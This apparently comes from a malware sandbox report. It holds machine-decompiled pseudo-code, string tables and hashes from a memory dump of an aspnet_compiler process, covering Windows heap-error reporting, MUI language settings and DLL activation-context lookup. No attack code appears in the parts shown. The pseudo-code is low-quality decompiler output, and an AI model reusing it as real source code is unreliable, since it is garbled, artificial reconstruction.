The critical section is owned by thread %p., xrefs: 012FB3B9
an invalid address, %p, xrefs: 012FB4CF
If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 012FB314
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 012FB476
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 012FB2DC
<unknown>, xrefs: 012FB27E, 012FB2D1, 012FB350, 012FB399, 012FB417, 012FB48E
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 012FB38F
The instruction at %p referenced memory at %p., xrefs: 012FB432
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 012FB323
The instruction at %p tried to %s , xrefs: 012FB4B6
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 012FB3D6
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 012FB53F
*** Resource timeout (%p) in %ws:%s, xrefs: 012FB352
This failed because of error %Ix., xrefs: 012FB446
a NULL pointer, xrefs: 012FB4E0
*** enter .exr %p for the exception record, xrefs: 012FB4F1
*** Inpage error in %ws:%s, xrefs: 012FB418
Go determine why that thread has not released the critical section., xrefs: 012FB3C5
*** An Access Violation occurred in %ws:%s, xrefs: 012FB48F
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 012FB39B
write to, xrefs: 012FB4A6
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 012FB47D
The resource is owned shared by %d threads, xrefs: 012FB37E
*** A stack buffer overrun occurred in %ws:%s, xrefs: 012FB2F3
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 012FB305
The resource is owned exclusively by thread %p, xrefs: 012FB374
read from, xrefs: 012FB4AD, 012FB4B2
*** enter .cxr %p for the context, xrefs: 012FB50D
*** then kb to get the faulting stack, xrefs: 012FB51C
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 012FB484

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 9285421a7c8422c36a8ccec3ac0c77df49ba618f30489f3650fef9b3c75bb8f4
Instruction ID: ab15d8b0303ea669656c8992d11b2eda88ebf547c2a709c3d50d47f2755cf0f2
Opcode Fuzzy Hash: 9285421a7c8422c36a8ccec3ac0c77df49ba618f30489f3650fef9b3c75bb8f4
Instruction Fuzzy Hash: 6C8126B5A70205FFEB255B4ACC9AE7B7F36EF96A52F41405CF7041B112D2A18411C772

Uniqueness

Uniqueness Score: -1.00%

Function 01301C06 Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01301C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x12248a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0124B150();
				} else {
					E0124B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x133589c);
				E0124B150("Heap error detected at %p (heap handle %p)\n",  *0x13358a0);
				_t27 =  *0x1335898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01301E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0124B150();
				} else {
					E0124B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0124B150("Error code: %d - %s\n",  *0x1335898);
				_t113 =  *0x13358a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0124B150();
					} else {
						E0124B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0124B150("Parameter1: %p\n",  *0x13358a4);
				}
				_t115 =  *0x13358a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0124B150();
					} else {
						E0124B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0124B150("Parameter2: %p\n",  *0x13358a8);
				}
				_t117 =  *0x13358ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0124B150();
					} else {
						E0124B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0124B150("Parameter3: %p\n",  *0x13358ac);
				}
				_t119 =  *0x13358b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0124B150();
					} else {
						E0124B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x13358b4);
					E0124B150("Last known valid blocks: before - %p, after - %p\n",  *0x13358b0);
				} else {
					_t120 =  *0x13358b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0124B150();
				} else {
					E0124B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0124B150("Stack trace available at %p\n", 0x13358c0);
			}

0x01301c10
0x01301c16
0x01301c1e
0x01301c3d
0x01301c3e
0x01301c20
0x01301c35
0x01301c3a
0x01301c44
0x01301c55
0x01301c5a
0x01301c65
0x01301c67
0x00000000
0x01301c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01301c67
0x01301cdc
0x01301ce5
0x01301d04
0x01301d05
0x01301ce7
0x01301cfc
0x01301d01
0x01301d0b
0x01301d17
0x01301d1f
0x01301d25
0x01301d30
0x01301d4f
0x01301d50
0x01301d32
0x01301d47
0x01301d4c
0x01301d61
0x01301d67
0x01301d68
0x01301d6e
0x01301d79
0x01301d98
0x01301d99
0x01301d7b
0x01301d90
0x01301d95
0x01301daa
0x01301db0
0x01301db1
0x01301db7
0x01301dc2
0x01301de1
0x01301de2
0x01301dc4
0x01301dd9
0x01301dde
0x01301df3
0x01301df9
0x01301dfa
0x01301e00
0x01301e0a
0x01301e13
0x01301e32
0x01301e33
0x01301e15
0x01301e2a
0x01301e2f
0x01301e39
0x01301e4a
0x01301e02
0x01301e02
0x01301e08
0x00000000
0x00000000
0x01301e08
0x01301e5b
0x01301e7a
0x01301e7b
0x01301e5d
0x01301e72
0x01301e77
0x01301e95

Strings

heap_failure_virtual_block_corruption, xrefs: 01301C91
Last known valid blocks: before - %p, after - %p, xrefs: 01301E45
heap_failure_usage_after_free, xrefs: 01301CBB
Stack trace available at %p, xrefs: 01301E86
heap_failure_listentry_corruption, xrefs: 01301CD0
Heap error detected at %p (heap handle %p), xrefs: 01301C50
heap_failure_lfh_bitmap_mismatch, xrefs: 01301CD7
Error code: %d - %s, xrefs: 01301D12
Parameter2: %p, xrefs: 01301DA5
heap_failure_buffer_underrun, xrefs: 01301C9F
heap_failure_invalid_argument, xrefs: 01301CAD
Parameter1: %p, xrefs: 01301D5C
heap_failure_cross_heap_operation, xrefs: 01301CC2
heap_failure_invalid_allocation_type, xrefs: 01301CB4
HEAP[%wZ]: , xrefs: 01301C30, 01301CF7, 01301D42, 01301D8B, 01301DD4, 01301E25, 01301E6D
heap_failure_block_not_busy, xrefs: 01301CA6
HEAP: , xrefs: 01301C16, 01301C3D, 01301D04, 01301D4F, 01301D98, 01301DE1, 01301E32, 01301E7A
Parameter3: %p, xrefs: 01301DEE
heap_failure_unknown, xrefs: 01301C75
heap_failure_entry_corruption, xrefs: 01301C83
heap_failure_buffer_overrun, xrefs: 01301C98
heap_failure_freelists_corruption, xrefs: 01301CC9
heap_failure_multiple_entries_corruption, xrefs: 01301C8A
heap_failure_internal, xrefs: 01301C6E
heap_failure_generic, xrefs: 01301C7C

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: b684d12f618363ad086d5a57213ca4aa0cfc0ab745b6129207ab68526a5678a0
Instruction ID: 79aa26e161bd58424966b9908d5595f719b16b8b8c90ab958102ac3c0abbb6e5
Opcode Fuzzy Hash: b684d12f618363ad086d5a57213ca4aa0cfc0ab745b6129207ab68526a5678a0
Instruction Fuzzy Hash: BE61CF73631149DFD726AB99E4A5E3477E8EB54B24F0A802AF90E5F781D634DC40CB0A

Uniqueness

Uniqueness Score: -1.00%

Function 01253D34 Relevance: 6.7, Strings: 5, Instructions: 435
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E01253D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01251B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01251B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01251B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01251B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01251B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01264620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0128F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01291370(_t276, 0x1224e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0128BB40(0,  &_v68, _t170);
									if(L012543C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0128BB40(_t257,  &_v68, _t243);
								if(L012543C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01291370(_t278, 0x1224e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01264620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0128F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01291370(_v16, 0x1224e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E0128BB40(_t262,  &_v68, _t244);
								if(L012543C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E01291370(_t282, 0x1224e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E0128BB40(_t262,  &_v68, _t201);
							if(L012543C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01264620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E0128F3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E01291370(_t280, 0x1224e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E0128BB40(_t267,  &_v68, _t245);
							if(L012543C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E01291370(_t284, 0x1224e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E0128BB40(_t267,  &_v68, _t224);
						if(L012543C0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x01253d3c
0x01253d42
0x01253d44
0x01253d46
0x01253d49
0x01253d4c
0x01253d4f
0x01253d52
0x01253d55
0x01253d58
0x01253d5b
0x01253d5f
0x01253d61
0x01253d66
0x012a8213
0x012a8218
0x01254085
0x01254088
0x0125408e
0x01254094
0x0125409a
0x012540a0
0x012540a6
0x012540a9
0x012540af
0x012540b6
0x012540bd
0x012540bd
0x01253d83
0x012a821f
0x012a8229
0x012a8238
0x012a8238
0x012a823d
0x012a823d
0x01253da0
0x01253daf
0x01253db5
0x01253dba
0x01253dba
0x01253dd4
0x01253e94
0x01253eab
0x01253f6d
0x01253f84
0x0125406b
0x0125406b
0x0125406e
0x0125406e
0x01254070
0x01254074
0x012a8351
0x012a8351
0x0125407a
0x0125407f
0x012a835d
0x012a8370
0x012a8377
0x012a8379
0x012a837c
0x012a837c
0x012a835d
0x00000000
0x0125407f
0x01253f8a
0x01253f8d
0x01253f90
0x01253f95
0x012a830d
0x012a830f
0x01253f9b
0x01253fac
0x01253fae
0x01253fb1
0x01253fb1
0x01253fb6
0x012a8317
0x012a831a
0x00000000
0x01253fbc
0x01253fc1
0x01253fc9
0x01253fd7
0x01253fda
0x01253fdd
0x01254021
0x01254021
0x01254029
0x01254030
0x01254044
0x01254046
0x01254046
0x01254044
0x01254049
0x012a8327
0x012a8334
0x012a8339
0x012a833c
0x0125404f
0x0125404f
0x0125404f
0x01254051
0x01254056
0x01254063
0x01254063
0x01254068
0x00000000
0x01254068
0x01253fdf
0x01253fe2
0x01253fe4
0x01253fe7
0x01253fef
0x01254003
0x01254005
0x01254005
0x0125400c
0x01254013
0x01254016
0x01254017
0x0125401b
0x0125401e
0x00000000
0x0125401e
0x01253fb6
0x01253eb1
0x01253eb4
0x01253eb7
0x01253ebc
0x012a82a9
0x012a82ab
0x01253ec2
0x01253ed3
0x01253ed5
0x01253ed8
0x01253ed8
0x01253edd
0x012a82b3
0x012a82b6
0x00000000
0x01253ee3
0x01253ee8
0x01253eed
0x01253ef0
0x01253ef3
0x01253f02
0x01253f05
0x01253f08
0x012a82c0
0x012a82c3
0x012a82c5
0x012a82c8
0x012a82d0
0x012a82e4
0x012a82e6
0x012a82e6
0x012a82ed
0x012a82f4
0x012a82f7
0x012a82f8
0x012a82fc
0x012a82ff
0x012a82ff
0x01253f0e
0x01253f11
0x01253f16
0x01253f1d
0x01253f31
0x012a8307
0x012a8307
0x01253f31
0x01253f39
0x01253f48
0x01253f4d
0x01253f50
0x01253f50
0x01253f53
0x01253f58
0x01253f65
0x01253f65
0x01253f6a
0x00000000
0x01253f6a
0x01253edd
0x01253dda
0x01253ddd
0x01253de0
0x01253de5
0x012a8245
0x01253deb
0x01253df7
0x01253dfc
0x01253dfe
0x01253e01
0x01253e01
0x01253e06
0x012a824d
0x012a824f
0x012a8254
0x00000000
0x01253e0c
0x01253e11
0x01253e16
0x01253e19
0x01253e29
0x01253e2c
0x01253e2f
0x012a825c
0x012a825f
0x012a8261
0x012a8264
0x012a826c
0x012a8280
0x012a8282
0x012a8282
0x012a8289
0x012a8290
0x012a8293
0x012a8294
0x012a8298
0x012a829b
0x012a829b
0x01253e35
0x01253e38
0x01253e3d
0x01253e44
0x01253e58
0x012a82a3
0x012a82a3
0x01253e58
0x01253e60
0x01253e6f
0x01253e74
0x01253e77
0x01253e77
0x01253e7a
0x01253e7f
0x01253e8c
0x01253e8c
0x01253e91
0x00000000
0x01253e91

Strings

Kernel-MUI-Language-Allowed, xrefs: 01253DC0
WindowsExcludedProcs, xrefs: 01253D6F
Kernel-MUI-Number-Allowed, xrefs: 01253D8C
Kernel-MUI-Language-SKU, xrefs: 01253F70
Kernel-MUI-Language-Disallowed, xrefs: 01253E97

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: d31917ce99394d3738ff1aac614bbe1fdf6cbe37e300de426bc76a2e7c85108a
Instruction ID: f4b94d432edd73fcb8fccb9bd566c4e8f21178404e948c19b5a39ca15426b87d
Opcode Fuzzy Hash: d31917ce99394d3738ff1aac614bbe1fdf6cbe37e300de426bc76a2e7c85108a
Instruction Fuzzy Hash: CBF15172D2025AEFCF15EF98C980AEEBBB9FF18750F14005AE905A7250E7749E41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01278E00 Relevance: 5.1, Strings: 4, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01278E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x133d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1338464; // 0x76ed0110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1335780 & 0x00000003) != 0) {
							E012C5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1335780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0128B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1337984; // 0xdf2c30
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1338464; // 0x76ed0110
					 *0x133b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01279B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1335780 & 0x00000005) != 0) {
						_push(_t49);
						E012C5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x01278e0f
0x01278e16
0x01278e19
0x01278e1b
0x01278e21
0x01278e7f
0x01278e85
0x012b9354
0x012b936c
0x012b9371
0x012b937b
0x012b9381
0x012b9381
0x012b937b
0x01278e9d
0x01278e9d
0x01278e29
0x01278e2c
0x01278e38
0x01278e3e
0x01278e43
0x01278eb5
0x01278eb9
0x012b92aa
0x012b92af
0x012b92e8
0x012b92e8
0x012b92af
0x01278eb9
0x01278e45
0x01278e53
0x01278e5b
0x01278e5f
0x01278e78
0x01278e78
0x01278e7d
0x01278ec3
0x01278ecd
0x01278ed2
0x01278ed2
0x01278ec5
0x01278ec5
0x00000000
0x01278e7d
0x01278e67
0x01278ea4
0x012b931a
0x00000000
0x00000000
0x012b9320
0x01278ea4
0x01278e70
0x012b9325
0x012b9340
0x012b9345
0x012b9345
0x01278e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

minkernel\ntdll\ldrsnap.c, xrefs: 012B933B, 012B9367
Querying the active activation context failed with status 0x%08lx, xrefs: 012B9357
LdrpFindDllActivationContext, xrefs: 012B9331, 012B935D
Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 012B932A

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
API String ID: 0-3779518884
Opcode ID: 7c1679b82732b409662c19067d98ffa96ea464326149bde219b0ed8f21fb986b
Instruction ID: bfd3be0d9c734aac24e8769d3923c20dbc2d2c4946f1af38c02a01e7ab6dcec9
Opcode Fuzzy Hash: 7c1679b82732b409662c19067d98ffa96ea464326149bde219b0ed8f21fb986b
Instruction Fuzzy Hash: C5410D32A30317AFEF36AB1CD88DB7776B5AB04754F054969FB0897152E7B05D808381

Uniqueness

Uniqueness Score: -1.00%

Function 01258794 Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E01258794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
